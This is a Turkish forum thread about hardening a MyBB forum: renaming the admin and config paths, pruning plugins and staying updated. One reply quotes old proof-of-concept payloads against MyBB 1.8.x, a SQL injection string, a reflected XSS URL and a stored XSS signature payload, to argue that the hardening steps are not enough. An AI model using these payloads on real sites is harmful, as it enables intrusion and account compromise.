Giriş Yap / Kayıt Ol

WM Aracı'na üyelikler tekrar açıldı! Kayıt olmak için TIKLAYIN!

2Beğeni
  • 1 Yazan xsafa
  • 1 Yazan Maybe

Cevap Yaz Favorilerime Ekle
Seçenekler Stil
Geri Git   Forum > > Mybb

MyBB Güvenlik Önlemleri

  #1  
Okunmamış 10 Ağustos 2016, 23:38
xsafa Adlı Üyenin Avatarı
Bla ' Bla ' Bla
 
Üyelik Tarihi: 01 Ağustos 2016
Yaş / Cinsiyet: 19 / Erkek
Konum: Erzurum
Ad, Soyad: Sa... Ya...
Mesajlar: 1.105
Beğeniler: 341 / 663
Ticaret: 3, 100%
-- Aşagıda ki yazdığım adımları uygularsanız kolay kolay sisteminize 3. şahıslar erişemez.


1-) İmkanınız var ise LİNUX VPS satın alın ve bu sunucuda sadece kendi forum sitenizi barındırın. Eğer bütçeniz sunucu almaya yetmiyor ise Linux Hosting alın , fakat hosting alacağınız sitenin referanslarına veya Google aracılığıyla şirkete yapılan yorumları inceleyin kesinlikle yolun başında düzgün bie hosting seçmek çok işinize yarayacaktır.



2-) MyBB scriptimizi orjianl sitesinden indirelim , fakat orjinal sitesindeki script Türkçe olmadığından dolayı MyBB.com.tr den indirmenizi öneririm MyBB.com onaylı bir sitedir. Kesinlikle buradan indirdğiniz dosyaları gönül rahatlığıyla kullanabilirsiniz. ( Buradan xpserkan hocama birkez daha teşekkürlerimi sunuyorum duacısıyız )



3-) Hosting ve Dosya işlemlerini tamam bulduk , scripti nasıl kuracağız dediğinizi ufaktanda olsa duyar gibiyim Bu Linkten detaylı olarak bilgi sahibi olup kurulumunuzu gerçekleştirebilirsiniz.



4-) Kurulumumuzu yaptık peki bundan sonra başka Güvenlik Önlemi varmı ? Elbette var

# Chmod Ayarlarını buraya teker teker yazıp yazıyı uzatmak istemiyorum , Chmod Ayarları İçin Üzerime Tıkla

# Admin Panel Yolunu değiştirme ; yeni panel adını yenipanelyolu yapacağımızı farzediyoruz.

1-) FTP \ FORUMUN KURULU OLDUĞU DİZİN \ İNC \ İNİT.PHP Dosyasını açıyoruz

2-) " $config[’admin_dir’] = "admin"; " bu satırı bulun

3-) " $config[’admin_dir’] = "yenipanelyolu"; " yenipanelyolu yazdığım yeri kendinize göre editleyin kaydedin çıkın.

4-) FTP \ FORUMUN KURULU OLDUĞU DİZİN \ İNC \ CONFİG.PHP Dosyasını açıyoruz

5-) " $config[’admin_dir’] = ’admin’; " bu satırı bulun

6-) " $config[’admin_dir’] = ’yenipanelyolu’; " yenipanelyolu yazan yere init dosyasında olduğu gibi editleyin kaydedin çıkın.

7-) Forumun Kurulu Olduğu Dizinde Admin Dosyasının Adını yenipanelyolu Yapıyoruz yenipanelyolu Adını Kendinize Göre Editleyin.



# Config Yolunu değiştirme , bu maddede inc klasöründeki config.php ismini nasıl değiştiricez onu göstericem ; yeni config dosyasının adını configxx yapacağımızı farzediyoruz

1-) FTP \ FORUMUN KURULU OLDUĞU DİZİN \ İNC \ İNİT.PHP

2-) " if(!file_exists(MYBB_ROOT."inc/config.php")) " Bu satırı bulup

3-) " if(!file_exists(MYBB_ROOT."inc/configxx.php")) " olarak değiştirip kaydediyoruz.

4-) inc klasöründeki config.php i configxx.php olarak yeniden adlandırıp kayediyoruz.



# Admin Panel Girişinde Pin Kullanımı ; MyBB 1.8 Sürümlerinde otomatik olarak kurulumda oluşturduğundan dolayı bu madde ile ilgili detaya inmeyeceğim.



# Eklenti Kullanımı ; MyBB bu konuda tam bir cennettir fakat eklentilerin %95 i gereksizdir , ihtiyacınız olmayan eklentileri direk silin sitenizde barındırmayın.



# MyBB Son Sürüm Kullanın , makaledeki en önemli madde şuan bu olarak görünüyor , güncel MyBB sürümü kullanmak hayat kurtarır



# Kimseye Admin Yetkisi Vermeyin , Evet kesinlikle hiç kimseye admin panel vermeyin kendinizde hiç bir sitede yada üyelikte kullanmadığınız güçlü bir şifre seçin.



Yukarıda yazdığım maddeleri harfiyen yerrine getiren birisinin sitesinin hacklenmesi imkansız. Keylogger yemediğiniz sürece



Kaynak http://www.ztekno.org/mybb-kurulum-v...lik-onlemleri/
Maybe bunu beğendi.
  #2  
Okunmamış 11 Ağustos 2016, 00:01
Avatar Seçilmemiş
Üyeliği Durdurulmuş
 
Üyelik Tarihi: 23 Temmuz 2016
Yaş / Cinsiyet: 27 / Erkek
Meslek: Analist
Konum: İzmir
Ad, Soyad: Ül... At...
Mesajlar: 125
Beğeniler: 45 / 32
Ticaret: 1, 100%
Hocam hacklenmesi imkansız değildir kendi sistemlerinde hemen hemen ver versionda onlarca güvenlik zafiyeti reportları yapılıyor.En büyük sorun eklentilerden kaynaklanan zafiyetlerden dolayı sistemin hacklenmesi oluyor.Fakat bilgi sahibi kişilerce sistemin kendisinde de zafiyet tesbit etmek zor değil.%2 oranın da güvenlik önlemi almış olursunuz bu şekilde
xsafa bunu beğendi.
  #3  
Okunmamış 11 Ağustos 2016, 00:25
xsafa Adlı Üyenin Avatarı
Bla ' Bla ' Bla
 
Üyelik Tarihi: 01 Ağustos 2016
Yaş / Cinsiyet: 19 / Erkek
Konum: Erzurum
Ad, Soyad: Sa... Ya...
Mesajlar: 1.105
Beğeniler: 341 / 663
Ticaret: 3, 100%
@Maybe hocam mybb sitelerin %90 su bulundugu hostingin gecilmesi , %5 sm %5 de eklentiler nedeniyle olusan aciklardan dolayi hackleniyor eklentisiz bir forum & paylasimsiz hosting kullanan birisinin hack yemesi cooooook buyuk hack gruplari yapabilir dediginiz gibi bir olay olsa piyasada mybb kalmazdi ,

Eger kendinize cok guveniyor iseniz site atayim test edelim 3 yillik mybb bilgim var.

Ek Olarak:
Alıntı:
Maybe Adlı Üyeden Alıntı
Hocam hacklenmesi imkansız değildir kendi sistemlerinde hemen hemen ver versionda onlarca güvenlik zafiyeti reportları yapılıyor.En büyük sorun eklentilerden kaynaklanan zafiyetlerden dolayı sistemin hacklenmesi oluyor.Fakat bilgi sahibi kişilerce sistemin kendisinde de zafiyet tesbit etmek zor değil.%2 oranın da güvenlik önlemi almış olursunuz bu şekilde
Ayricz eklemeyide unuttum mybb sifre hash kırmakda okadar kolay bir olay degil.
  #4  
Okunmamış 11 Ağustos 2016, 00:50
Avatar Seçilmemiş
Üyeliği Durdurulmuş
 
Üyelik Tarihi: 23 Temmuz 2016
Yaş / Cinsiyet: 27 / Erkek
Meslek: Analist
Konum: İzmir
Ad, Soyad: Ül... At...
Mesajlar: 125
Beğeniler: 45 / 32
Ticaret: 1, 100%
Hocam öncelikle bu tür konuşmalardan hiç haz etmiyorum.Oturup mybb bir sisteme giriş yapmam ne bana birşey kazandırır ne size birşey kazandırır ancak kendini kanıtlama çabasına girer.Bunuda ancak bu mesleğe yeni atılan kişilerin ani bir hevesle atılım yapmaya çalışması söz konusudur.Başarılı olunması bile kendini küçük düşürme nedenidir yani.

Size örnek olarak geçmişe dönük bir kaç exp açıklaması yapayım tezinizin ne kadar yanlış olduğunu görmenizi sağlar.

1. SQL Injection

POST 'question_id' - ID'+or+1+group+by+concat_ws(0x3a,database(),floor( rand(0)*2))+having+min(0)+or+1#

2. Cross Site Scripting

localhost/mybb-1.8.1/report.php?type=XSS%22%3E%3Cscript%3Ealert%28666%2 9%3C%2fscript%3E&pid=1 hemde en basit pocla etkileşime giriyor.Yeni yetmeler dahi bu hatayı yapmaz ama yapılabiliyor sonuç olarak insan yapımı ve "en büyük güvenlik açığı insandır".

Açık nerede kardeşim diyenler için

<div class="modal">
<div style="overflow-y: auto; max-height: 400px;" class="modal_0">
<form action="report.php" method="post" class="reportData_0" onsubmit="javascript: return Report.submitReport(0);">
<input type="hidden" name="my_post_key" value="c08308117fcadae6609372f46fa97835" />
<input type="hidden" name="action" value="do_report" />
<input type="hidden" name="type" value="0" />
<input type="hidden" name="pid" value="0" />

En tehlikeli zafiyelerden birisi olarak kabul gören Stored XSS - Signature

my_post_key=c08308117fcadae6609372f46fa97835&signa ture=%5Bvideo%3Dyoutube%5Dhttp%3A%2F%2Fyoutube.com %3F%22+xss%3D%22true%22+666%3D%22%5B%2Fvideo%5D&up dateposts=0&action=do_editsig&submit=Update+Signat ure

vs vs şeklinde gidiyor .Hack işlemlerinde en büyük etki Sm'dir hocam bunu unutmayın.Sistemde bir zafiyet bulamayabilirsiniz, gözünüzden kaçabilir.Fakat doğru bir sm direk sonuca ulaştırır ve kaliteli bir senaryo ile iz bırakmaz.

Sistemler genellikle dikkatsiz plugin kullanımından hacklenir beğendiğiniz önünüze gelen herşeyi yüklememelisiniz..Sonsuz döngü de olan webmaster üşengeçliğini artık yazmak dahi istemiyorum.Gördüğün gibi tamamen mybb kendisinden kaynaklanan sorunlar.0day expler artık istenilen verimi karşılamadıkları sürece public edilmezler.Kimse bu riski almaz eski expleri incelemek için zaten herhangi bir arama motorunu kullanabilirsiniz.
  #5  
Okunmamış 11 Ağustos 2016, 01:02
xsafa Adlı Üyenin Avatarı
Bla ' Bla ' Bla
 
Üyelik Tarihi: 01 Ağustos 2016
Yaş / Cinsiyet: 19 / Erkek
Konum: Erzurum
Ad, Soyad: Sa... Ya...
Mesajlar: 1.105
Beğeniler: 341 / 663
Ticaret: 3, 100%
Konu daha fazla uzamasin hack yemeyen sistem yoktur , xxs ile sql yapabilmek her baba yiğidin harcı değil bugun facebook gibi milyar dolarlar harcayan bie sistemde dahi acık cıkabiliyor. Egerki rakibiniz/dusmaniniz asiri ust duzey birileri degilse sorunda cikmayacaktir
Cevap Yaz Favorilerime Ekle


Konuyu toplam 1 kişi okuyor. (0 üye ve 1 Ziyaretçi)
 
Seçenekler
Stil
Normal Normal

Geri Git   Forum > Mybb


Yetkileriniz
Konu açma yetkiniz: Yok
Cevap Yazma Yetkiniz Yok
Eklenti yükleme yetkiniz: Yok
Mesajınızı değiştirme yetkiniz: Yok

BB code: Açık
İfadeler: Açık
[IMG] Kodları: Açık
HTML kodu: Kapalı




Tüm Zamanlar GMT +3 Olarak Ayarlanmış. Şu anki Zaman: 15:47.